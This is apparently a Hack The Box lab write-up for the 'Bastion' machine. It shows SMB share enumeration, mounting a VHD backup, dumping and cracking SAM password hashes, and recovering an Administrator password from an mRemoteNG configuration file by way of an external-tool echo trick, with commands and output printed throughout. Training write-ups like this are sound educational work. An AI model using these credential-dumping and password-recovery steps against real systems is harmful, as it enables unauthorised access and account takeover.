Bastion was a relatively simple machine with the biggest issue steming from maintaining a connection to a remote mounted drive. Utilising a machine vhd backup we dump the users password and use this to access the live system, only to find it has an administrator password stored within a configuration file which we can decrypt using the mRemoteNG.
- Find backup file on share
- Mount share to gain access to files
- Dump password hashes from the SAM and crack
- SSH in using cracked password
- Locate and exfiltrate mRemoteNG configuration file
- Install mRemoteNG on windows machine
- Create external tool to reveal configuration password
- SSH in using administrator password
Like always, first up we go and enumerate opened ports.
[email protected]:~/Desktop/machines/bastion# nmap -sC -sV -oA nmap 10.10.10.134 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0) | ssh-hostkey: | 2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA) | 256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA) |_ 256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -39m56s, deviation: 1h09m13s, median: 0s | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: Bastion | NetBIOS computer name: BASTION\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2019-04-28T14:06:18+02:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-04-28 21:36:16 |_ start_date: 2019-04-28 19:40:31
From here we notice ports 139, 135 and 445 are open which makes the obvious next step to enumerate if there are any open SMB shares.
[email protected]:~/Desktop/machines/bastion# nmap -v -oA shares --script smb-enum-shares 10.10.10.134 Host script results: | smb-enum-shares: | account_used: guest | \\10.10.10.134\ADMIN$: | Type: STYPE_DISKTREE_HIDDEN | Comment: Remote Admin | Anonymous access: <none> | Current user access: <none> | \\10.10.10.134\Backups: | Type: STYPE_DISKTREE | Comment: | Anonymous access: <none> | Current user access: READ | \\10.10.10.134\C$: | Type: STYPE_DISKTREE_HIDDEN | Comment: Default share | Anonymous access: <none> | Current user access: <none> | \\10.10.10.134\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: Remote IPC | Anonymous access: <none> |_ Current user access: READ/WRITE
Find backup file on share
Taking a look at the shares available to us, the backup share stands out and we have read access to it, so we can go ahead and connect using smbclient to see if there’s anything of interest. We immediately can see an interesting file called note.txt.
[email protected]:~/Desktop/machines/bastion# smbclient \\\\10.10.10.134\\Backups
smb: \> dir . D 0 Sun Apr 28 21:54:20 2019 .. D 0 Sun Apr 28 21:54:20 2019 bVpWdnRoXM D 0 Sun Apr 28 21:54:20 2019 HRJjGGZnfE D 0 Sun Apr 28 21:39:44 2019 nmap-test-file A 260 Sun Apr 28 21:47:28 2019 note.txt AR 116 Tue Apr 16 19:40:09 2019 SDT65CB.tmp A 0 Fri Feb 22 23:13:08 2019 WindowsImageBackup D 0 Fri Feb 22 23:14:02 2019
By downloading and reading note.txt we see the following:
Sysadmins: please don’t transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
Interesting, so we know they’ve got large backups, given we’re on a VPN ourselves we’ll keep this in mind. Continuing to browse the share we see there’s a directory called ‘Backup 2019-02-22’.
smb: \> cd WindowsImageBackup\ smb: \WindowsImageBackup\> dir . D 0 Fri Feb 22 23:14:02 2019 .. D 0 Fri Feb 22 23:14:02 2019 L4mpje-PC D 0 Fri Feb 22 23:15:32 2019 7735807 blocks of size 4096. 2763426 blocks available smb: \WindowsImageBackup\> cd L4mpje-PC\ smb: \WindowsImageBackup\L4mpje-PC\> dir . D 0 Fri Feb 22 23:15:32 2019 .. D 0 Fri Feb 22 23:15:32 2019 Backup 2019-02-22 124351 D 0 Fri Feb 22 23:15:32 2019 Catalog D 0 Fri Feb 22 23:15:32 2019 MediaId A 16 Fri Feb 22 23:14:02 2019 SPPMetadataCache D 0 Fri Feb 22 23:15:32 2019 smb: \WindowsImageBackup\L4mpje-PC\> cd Backup 2019-02-22 124351\
Within the backup directory we see a couple of vhd files of interest.
Mount share to gain access to files
From here we can make a directory to serve as a mounting point for this share and mount it.
Now that we have the share mounted, we can easily browse the file share, but we also want to look at mounting the vhd files. Using guestmount we can do this easily…
[email protected]:~/Desktop/machines/bastion# guestmount -v --add 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd inspect_os: fses: fs: /dev/sda1 (ntfs) role: other inspect_get_roots: roots: guestmount: no operating system was found on this disk
Woops, okay so lets try the other backup image.
[email protected]:~/Desktop/machines/bastion# guestmount -v --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd
Dump password hashes from the SAM and crack
After some lengthy time mounting this drive we can see it successfully mounts and we can view the file system. At this point we can go straight for credentials and use PWDump to extract credential hashes from the SAM using the SYSTEM hive.
[email protected]:/mnt/vhd/Windows/System32/config# pwdump SYSTEM SAM Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
The first thing we notice is that the Administrator credentials aren’t easily cracked and this is no necessarily going to be the same as the live system. Because beggars can’t be choosers we look at cracking the NTLM hash for L4mpje (26112010952d963c8dc4217daec986d9). Figuring this may already be a part of a known cracked hash list we can go over to hashkiller to see whether we can easily get the password.
SSH in using cracked password
At this point we should be on top of the world, given SSH is open on this machine we can attempt to logon using the L4mpje username and cracked password.
[email protected]:~/Desktop/machines/bastion# ssh [email protected] The authenticity of host '10.10.10.134 (10.10.10.134)' can't be established. ECDSA key fingerprint is SHA256:ILc1g9UC/7j/5b+vXeQ7TIaXLFddAbttU86ZeiM/bNY. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '10.10.10.134' (ECDSA) to the list of known hosts. [email protected]'s password: Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. [email protected] C:\Users\L4mpje>dir Volume in drive C has no label. Volume Serial Number is 0CB3-C487 Directory of C:\Users\L4mpje 22-02-2019 14:50 <DIR> . 22-02-2019 14:50 <DIR> .. 22-02-2019 16:26 <DIR> Contacts 22-02-2019 16:27 <DIR> Desktop 22-02-2019 16:26 <DIR> Documents 22-02-2019 16:26 <DIR> Downloads 22-02-2019 16:26 <DIR> Favorites 22-02-2019 16:26 <DIR> Links 22-02-2019 16:26 <DIR> Music 22-02-2019 16:26 <DIR> Pictures 22-02-2019 16:26 <DIR> Saved Games 22-02-2019 16:26 <DIR> Searches 22-02-2019 16:26 <DIR> Videos 0 File(s) 0 bytes 13 Dir(s) 11.387.654.144 bytes free [email protected] C:\Users\L4mpje>cd Desktop
At this point if we look on the desktop and type out the user.txt file we have our flag.
[email protected] C:\Users\L4mpje\Desktop>dir Volume in drive C has no label. Volume Serial Number is 0CB3-C487 Directory of C:\Users\L4mpje\Desktop 22-02-2019 16:27 <DIR> . 22-02-2019 16:27 <DIR> .. 23-02-2019 10:07 32 user.txt 1 File(s) 32 bytes 2 Dir(s) 11.387.400.192 bytes free
Locate and exfiltrate mRemoteNG configuration file
Looking around the file system, we notice that it has mRemoteNG installed, and its configuration file can be found C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml
[email protected] C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml <?xml version="1.0" encoding="utf-8"?> <mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="f alse" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFile Encryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL 5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6"> <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Pas sword="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7em f7lWWA10dQKiw=="
Interesting, this string appears to be associated with the Administrator account.
At first glance this is stored as a base64 encoded string; however by digging deeper we find that mRemoteNG actually encrypts this string using AES, awwwww. There’s a couple of items we can work with though, the first is that this is open source so we could go and look at how this is encrypting the password and reverse it. The other option is that we can use a custom tool within mRemoteNG to easily extract the password, all we need to do is install it on another system and change the configuration file over.
Using scp we can download the configuratiuon file from the system by authenticating as L4mpje.
Install mRemoteNG on windows machine
Next we setup mRemoteNG on a windows machine and copy the configuration file over the the appropriate directory. This is pretty straight forward and the installers can be found here.
Create external tool to reveal configuration password
After running the program we need to setup an ‘external tool’ which will echo back the password variable which is stored within the mRemoteNG configuration file. To do this we click the following:
Tools > External Tools > New External Tool
Under filename we set ‘cmd’, and under arguments we use ‘/k echo “%password%”’
Now by running this tool we can see the Administrators password.
SSH in using administrator password
At this point it’s happy days, we have got the administrator password and can proceed to fully compromise this system using SSH.
[email protected]:~/Desktop/machines/bastion# ssh [email protected] [email protected]'s password: Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved. [email protected] C:\Users\Administrator>dir Volume in drive C has no label. Volume Serial Number is 0CB3-C487 Directory of C:\Users\Administrator 25-04-2019 06:08 <DIR> . 25-04-2019 06:08 <DIR> .. 23-02-2019 10:40 <DIR> Contacts 23-02-2019 10:40 <DIR> Desktop 23-02-2019 10:40 <DIR> Documents 23-02-2019 10:40 <DIR> Downloads 23-02-2019 10:40 <DIR> Favorites 23-02-2019 10:40 <DIR> Links 23-02-2019 10:40 <DIR> Music 23-02-2019 10:40 <DIR> Pictures 23-02-2019 10:40 <DIR> Saved Games 23-02-2019 10:40 <DIR> Searches 23-02-2019 10:40 <DIR> Videos 0 File(s) 0 bytes 13 Dir(s) 11.317.395.456 bytes free
At this point if we look on the desktop and type out the root.txt file we have our flag.
At the time of writing other HTB members had rated the machine elements as shown below. Feel free to reach out and provide any feedback or let me know if this helped.